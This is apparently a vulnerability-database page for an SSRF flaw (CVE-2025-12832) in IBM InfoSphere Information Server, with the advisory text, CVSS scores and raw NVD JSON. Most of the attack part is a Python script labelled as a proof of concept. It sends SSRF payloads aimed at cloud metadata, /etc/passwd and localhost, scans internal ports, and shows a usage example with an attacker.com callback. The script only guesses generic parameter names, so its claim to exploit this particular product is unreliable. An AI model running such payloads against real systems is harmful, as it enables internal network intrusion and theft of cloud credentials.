Security Vulnerability Report
中文
CVE-2025-12832 CVSS 4.6 MEDIUM

CVE-2025-12832

Published: 2025-12-08 22:15:50
Last Modified: 2025-12-10 23:58:12
Source: [email protected]

Description

IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:* - VULNERABLE
IBM InfoSphere Information Server 11.7.0.0
IBM InfoSphere Information Server 11.7.0.1
IBM InfoSphere Information Server 11.7.0.2
IBM InfoSphere Information Server 11.7.0.3
IBM InfoSphere Information Server 11.7.0.4
IBM InfoSphere Information Server 11.7.0.5
IBM InfoSphere Information Server 11.7.1.0
IBM InfoSphere Information Server 11.7.1.1
IBM InfoSphere Information Server 11.7.1.2
IBM InfoSphere Information Server 11.7.1.3
IBM InfoSphere Information Server 11.7.1.4
IBM InfoSphere Information Server 11.7.1.5
IBM InfoSphere Information Server 11.7.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12832 SSRF PoC - IBM InfoSphere Information Server # Disclaimer: This code is for educational and authorized security testing only # Author: Security Researcher # Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-12832 import requests import sys def test_ssrf_vulnerability(target_url, payload_url): """ Test for SSRF vulnerability in IBM InfoSphere Information Server This PoC demonstrates how an attacker could abuse the SSRF to make the server send requests to arbitrary URLs. """ headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': '*/*' } # SSRF payload - attacker controls the URL parameter ssrf_payloads = [ f'{payload_url}', # Direct URL injection f'http://127.0.0.1:80/', # Localhost enumeration f'http://169.254.169.254/latest/meta-data/', # Cloud metadata f'file:///etc/passwd' # Local file access attempt ] for payload in ssrf_payloads: try: # Common vulnerable parameter pattern data = { 'url': payload, 'endpoint': payload, 'redirect_uri': payload } response = requests.post( target_url, data=data, headers=headers, timeout=10, allow_redirects=False, verify=False ) print(f"[*] Testing payload: {payload}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") except requests.exceptions.RequestException as e: print(f"[!] Error testing payload: {e}") def enumerate_internal_services(target_url): """ Enumerate internal services via SSRF """ internal_ips = [ '127.0.0.1', 'localhost', '192.168.1.1', '10.0.0.1' ] common_ports = [22, 80, 443, 3306, 5432, 6379, 8080] for ip in internal_ips: for port in common_ports: try: payload = f'http://{ip}:{port}' data = {'url': payload} response = requests.post( target_url, data=data, timeout=5, verify=False ) if response.status_code < 500: print(f"[+] Possible service found: {ip}:{port}") except: pass if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: python cve_2025_12832_ssrf_poc.py <target_url> <callback_url>") print("Example: python cve_2025_12832_ssrf_poc.py https://target.com/api/fetch http://attacker.com/log") sys.exit(1) target = sys.argv[1] callback = sys.argv[2] print(f"[*] Testing CVE-2025-12832 SSRF on {target}") test_ssrf_vulnerability(target, callback) print("[*] Enumeration complete")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12832", "sourceIdentifier": "[email protected]", "published": "2025-12-08T22:15:49.837", "lastModified": "2025-12-10T23:58:11.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.7", "versionEndIncluding": "11.7.1.6", "matchCriteriaId": "989DFCAD-B96B-4FA5-AB43-D24352304233"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7253507", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.